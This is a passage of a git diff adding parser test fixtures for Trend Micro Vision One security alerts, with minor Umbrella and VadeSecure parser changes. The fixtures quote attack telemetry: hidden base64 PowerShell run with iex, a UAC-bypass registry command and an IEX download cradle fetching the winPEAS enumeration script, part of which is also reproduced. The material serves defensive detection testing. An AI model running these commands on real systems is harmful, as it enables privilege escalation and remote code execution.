\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Privilege Escalation via UAC Bypass", + "type": [ + "info" + ], + "url": "https://THE_WORKBENCH_URL" + }, + "@timestamp": "2022-09-06T02:49:31Z", + "container": { + "id": "7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496", + "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0" + }, + "host": { + "id": "35FA11DA-A24E-40CF-8B56-BAF8828CC15E", + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", + "parent": { + "command_line": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; " + } + }, + "registry": { + "data": { + "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x", + "type": "REG_SZ" + }, + "hive": "hkcr", + "key": "ms-settings\\shell\\open\\command", + "path": "hkcr\\ms-settings\\shell\\open\\command\\hkcr\\ms-settings\\shell\\open\\command\\delegateexecute", + "value": "delegateexecute" + }, + "related": { + "ip": [ + "10.10.58.51" + ], + "user": [ + "sam" + ] + }, + "rule": { + "name": "Privilege Escalation via UAC Bypass" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00022", + "case_id": "CL-1-20230706-00001", + "incident_id": "IC-1-20230706-00001", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + }, + "user": { + "domain": "shockwave", + "email": "support@pctutordetroit.com", + "id": "shockwave\\sam", + "name": "sam" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json new file mode 100644 index 000000000..a9a7d3d7c --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json @@ -0,0 +1,75 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n }\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"ce2af827-6dfc-4c5b-ab40-ab4b82351c83\", \"model\": \"Possible Web Service Abuse\", \"modelType\": \"preset\", \"score\": 39, \"severity\": \"medium\", \"createdDateTime\": \"2024-11-26T16:45:28Z\", \"updatedDateTime\": \"2024-11-26T16:45:28Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"name\": \"windows10\", \"ips\": [\"20.193.45.33\"]}, \"entityId\": \"e930412e-e09c-454b-a508-576ba266b9d8\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"ce9c7ad6-f895-4907-bf57-e34b59d4dc90\"}]}, \"description\": \"The adversary attempted to download a payload stored on a legitimate external web service.\", \"matchedRules\": [{\"id\": \"ef13e37e-148e-48d6-819f-021f4acfcace\", \"name\": \"Suspicious Powershell Connection To Web Service\", \"matchedFilters\": [{\"id\": \"97e70752-3b27-4db0-b840-507d3f37ffe6\", \"name\": \"Suspicious Powershell Connection To Web Service - Variant 2\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"mitreTechniqueIds\": [\"T1102\"], \"matchedEvents\": [{\"uuid\": \"4aed361f-de80-4679-bf18-608b2afe5ff7\", \"matchedDateTime\": \"2024-11-26T16:42:29.602Z\", \"type\": \"TELEMETRY_AMSI\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"amsi_rawDataStr\", \"field\": \"objectRawDataStr\", \"value\": \"<#\\n.SYNOPSIS\\n PowerShell adaptation of WinPEAS.exe / WinPeas.bat\\n.DESCRIPTION\\n For the legal enumeration of windows based computers that you either own or are approved to run this script on\\n.EXAMPLE\\n # Default - normal operation with username/password audit in drives/registry\\n .\\\\winPeas.ps1\\n\\n # Include Excel files in search: .xls, .xlsx, .xlsm\\n .\\\\winPeas.ps1 -Excel\\n\\n # Full audit - normal operation with APIs / Keys / Tokens\\n ## This will produce false positives ## \\n .\\\\winPeas.ps1 -FullCheck \\n\\n # Add Time stamps to each command\\n .\\\\winPeas.ps1 -TimeStamp\\n\\n.NOTES\\n Version: 1.3\\n PEASS-ng Original Author: PEASS-ng\\n winPEAS.ps1 Author: @RandolphConley\\n Creation Date: 10/4/2022\\n Website: https://github.com/peass-ng/PEASS-ng\\n\\n TESTED: PoSh 5,7\\n UNTESTED: PoSh 3,4\\n NOT FULLY COMPATIBLE: PoSh 2 or lower\\n#>\\n\\n######################## FUNCTIONS ########################\\n\\n[CmdletBinding()]\\nparam(\\n [switch]$TimeStamp,\\n [switch]$FullCheck,\\n [switch]$Excel\\n)\\n\\n# Gather KB from all patches installed\\nfunction returnHotFixID {\\n param(\\n [string]$title\\n )\\n # Match on KB or if patch does not have a KB, return end result\\n if (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -AllMatches -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n elseif (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value) {\\n return (($title | Select-String -NotMatch -Pattern 'KB(\\\\d{4,6})').Matches.Value)\\n }\\n}\\n\\nFunction Start-ACLCheck {\\n param(\\n $Target, $ServiceName)\\n # Gather ACL of object\\n if ($null -ne $target) {\\n try {\\n $ACLObject = Get-Acl $target -ErrorAction SilentlyContinue\\n }\\n catch { $null }\\n \\n # If Found, Evaluate Permissions\\n if ($ACLObject) { \\n $Identity = @()\\n $Identity += \\\"$env:COMPUTERNAME\\\\$env:USERNAME\\\"\\n if ($ACLObject.Owner -like $Identity ) { Write-Host \\\"$Identity has ownership of $Target\\\" -ForegroundColor Red }\\n # This should now work for any language. Command runs whoami group, removes the first two line of output, converts from csv to object, but adds \\\"group name\\\" to the first column.\\n whoami.exe /groups /fo csv | select-object -skip 2 | ConvertFrom-Csv -Header 'group name' | Select-Object -ExpandProperty 'group name' | ForEach-Object { $Identity += $_ }\\n $IdentityFound = $false\\n foreach ($i in $Identity) {\\n $permission = $ACLObject.Access | Where-Object { $_.IdentityReference -like $i }\\n $UserPermission = \\\"\\\"\\n switch -WildCard ($Permission.FileSystemRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n \\\"Write*\\\" { $userPermission = \\\"Write\\\"; $IdentityFound = $true }\\n \\\"Modify\\\" { $userPermission = \\\"Modify\\\"; $IdentityFound = $true }\\n }\\n Switch ($permission.RegistryRights) {\\n \\\"FullControl\\\" { $userPermission = \\\"FullControl\\\"; $IdentityFound = $true }\\n }\\n if ($UserPermission) {\\n if ($ServiceName) { Write-Host \\\"$ServiceName found with permissions issue:\\\" -ForegroundColor Red }\\n Write-Host -ForegroundColor red \\\"Identity $($permission.IdentityReference) has '$userPermission' perms for $Target\\\"\\n }\\n } \\n # Identity Found Check - If False, loop through and stop at root of drive\\n if ($IdentityFound -eq $false) {\\n if ($Target.Length -gt 3) {\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target -ServiceName $ServiceName\\n }\\n }\\n }\\n else {\\n # If not found, split path one level and Check again\\n $Target = Split-Path $Target\\n Start-ACLCheck $Target $ServiceName\\n }\\n }\\n}\\n\\nFunction UnquotedServicePathCheck {\\n Write-Host \\\"Fetching the list of services, this may take a while...\\\";\\n $services = Get-WmiObject -Class Win32_Service | Where-Object { $_.PathName -inotmatch \\\"`\\\"\\\" -and $_.PathName -inotmatch \\\":\\\\\\\\Windows\\\\\\\\\\\" -and ($_.StartMode -eq \\\"Auto\\\" -or $_.StartMode -eq \\\"Manual\\\") -and ($_.State -eq \\\"Running\\\" -or $_.State -eq \\\"Stopped\\\") };\\n if ($($services | Measure-Object).Count -lt 1) {\\n Write-Host \\\"No unquoted service paths were found\\\";\\n }\\n else {\\n $services | ForEach-Object {\\n Write-Host \\\"Unquoted Service Path found!\\\" -ForegroundColor red\\n Write-Host Name: $_.Name\\n Write-Host PathName: $_.PathName\\n Write-Host StartName: $_.StartName \\n Write-Host StartMode: $_.StartMode\\n Write-Host Running: $_.State\\n } \\n }\\n}\\n\\nfunction TimeElapsed { Write-Host \\\"Time Running: $($stopwatch.Elapsed.Minutes):$($stopwatch.Elapsed.Seconds)\\\" }\\nFunction Get-ClipBoardText {\\n Add-Type -AssemblyName PresentationCore\\n $text = [Windows.Clipboard]::GetText()\\n if ($text) {\\n Write-Host \\\"\\\"\\n if ($TimeStamp) { TimeElapsed }\\n Write-Host -ForegroundColor Blue \\\"=========|| ClipBoard text found:\\\"\\n Write-Host $text\\n \\n }\\n}\\n\\nFunction Search-Excel {\\n [cmdletbinding()]\\n Param (\\n [parameter(Mandatory, ValueFromPipeline)]\\n [ValidateScript({\\n Try {\\n If (Test-Path -Path $_) {$True}\\n \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Windows10\", \"relatedEntities\": [\"e930412e-e09c-454b-a508-576ba266b9d8\"], \"filterIds\": [\"97e70752-3b27-4db0-b840-507d3f37ffe6\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Possible Web Service Abuse", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" + }, + "@timestamp": "2024-11-26T16:45:28Z", + "action": { + "properties": { + "ScriptBlockText": "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')" + } + }, + "host": { + "id": "e930412e-e09c-454b-a508-576ba266b9d8", + "ip": [ + "20.193.45.33" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha256": "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "440C8F6BC2F87D1932261D8F49D014CA330BC49EEBEAEEE59DA61790A2910EAF" + ], + "ip": [ + "20.193.45.33" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Possible Web Service Abuse" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "medium", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file diff --git a/Umbrella/umbrella-proxy/ingest/parser.yml b/Umbrella/umbrella-proxy/ingest/parser.yml index 790c57048..442c5da45 100644 --- a/Umbrella/umbrella-proxy/ingest/parser.yml +++ b/Umbrella/umbrella-proxy/ingest/parser.yml @@ -28,6 +28,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "event.message.http_request_url" output_field: message pattern: "(%{URIPROTO:url_scheme}://)?(?:%{URIHOST:url_domain})?(?:%{URIPATHPARAM:url_path})" diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index 1e4a81657..45923af39 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml +++ b/VadeSecure/vade_secure_m365/_meta/fields.yml @@ -58,6 +58,22 @@ vadesecure.attachments: short: vadesecure.to_header type: array +vadesecure.auth_results_details.dkim: + description: The result of the DomainKeys Identified Mail (DKIM) + name: vadesecure.auth_results_details.dkim + type: keyword + +vadesecure.auth_results_details.dmarc: + description: Result of the Domand-based Message Authentication Reporting and Conformance + (DMARC) + name: vadesecure.auth_results_details.dmarc + type: keyword + +vadesecure.auth_results_details.spf: + description: The result of the Sender Policy Framework (SPF) + name: vadesecure.auth_results_details.spf + type: keyword + vadesecure.campaign.actions: description: The actions carried out for the remediation campaign. name: vadesecure.campaign.actions diff --git a/VadeSecure/vade_secure_m365/_meta/manifest.yml b/VadeSecure/vade_secure_m365/_meta/manifest.yml index d773e0e11..49acafa59 100644 --- a/VadeSecure/vade_secure_m365/_meta/manifest.yml +++ b/VadeSecure/vade_secure_m365/_meta/manifest.yml @@ -1,8 +1,10 @@ uuid: 